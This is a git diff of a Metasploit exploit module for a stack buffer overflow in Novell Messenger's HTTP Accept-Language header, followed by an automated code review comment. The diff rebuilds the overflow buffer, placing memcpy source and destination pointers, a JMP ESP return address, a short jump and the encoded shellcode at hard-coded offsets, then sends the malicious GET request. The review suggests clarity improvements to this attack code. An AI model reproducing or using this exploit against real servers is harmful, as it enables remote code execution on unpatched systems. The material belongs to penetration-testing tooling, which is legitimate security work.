Updated
git-svn-id: file:///home/svn/incoming/trunk@3601 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
589205e5ff
commit
7e0f539b12
|
@ -31,9 +31,7 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 500,
|
'Space' => 500,
|
||||||
'BadChars' =>
|
'BadChars' => "\x00\x0a\x2c\x3b"+ [*("A".."Z")].join,
|
||||||
"\x00\x3a\x3b\x3c\x3d\x3e\x3f\x09\x0b\x0a\x0d\x20\x21\x22\x23\x24\x25\x26\x2c\x10"+
|
|
||||||
[*("A".."Z")].join,
|
|
||||||
'StackAdjustment' => -3500,
|
'StackAdjustment' => -3500,
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
|
@ -49,34 +47,12 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
lang =
|
lang = Rex::Text.rand_text_alphanumeric(1900)
|
||||||
# Padding to reach the memcpy src pointer
|
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
|
||||||
Rex::Text.rand_text_alphanumeric(16) +
|
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
|
||||||
|
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
|
||||||
# The source pointer for the memcpy
|
lang[268, 2] = "\xeb\x06"
|
||||||
[target['Rets'][1]].pack('V') +
|
lang[276, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
# Padding to reach the stack return address
|
|
||||||
Rex::Text.rand_text_alphanumeric(240)
|
|
||||||
|
|
||||||
# The return address (a jmp esp)
|
|
||||||
[target['Rets'][0]].pack('V') +
|
|
||||||
|
|
||||||
# Jump over the next 6 bytes to payload
|
|
||||||
"\xeb\x06" +
|
|
||||||
|
|
||||||
# Padding to reach the memcpy dst pointer
|
|
||||||
Rex::Text.rand_text_alphanumeric(2) +
|
|
||||||
|
|
||||||
# The destination pointer for the memcpy
|
|
||||||
[target['Rets'][1]].pack('V') +
|
|
||||||
|
|
||||||
# The actual payload
|
|
||||||
payload.encoded +
|
|
||||||
|
|
||||||
# Padding to keep the request aligned in memory
|
|
||||||
Rex::Text.rand_text_alphanumeric(1500-payload.encoded.length)
|
|
||||||
|
|
||||||
|
|
||||||
res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n"
|
res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n"
|
||||||
|
|
||||||
|
|
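Review bot: The rewritten body of `exploit` replaces the old descriptive comments with `# SRC`, `# DST` and `# JMP ESP`, leaving the hard-coded offsets 16, 264, 268, 272 and 276 into `lang` undocumented, so the relationship between them, the 1900-byte buffer and the `'Space' => 500` limit from the first hunk is no longer visible to a reader. A single layout comment above the slice assignments would restore what the removed comments conveyed, e.g. `# lang layout: 16 = src pointer, 264 = return address, 268 = short jump, 272 = dst pointer, 276.. = payload (bounded by 'Space')`. `payload.encoded` is also evaluated twice in the final assignment; binding it once to a local (`enc = payload.encoded`) keeps the slice length and its contents in step and reads more clearly. The body of `exploit` continues past the end of the hunk, so the request send and cleanup are not under review here.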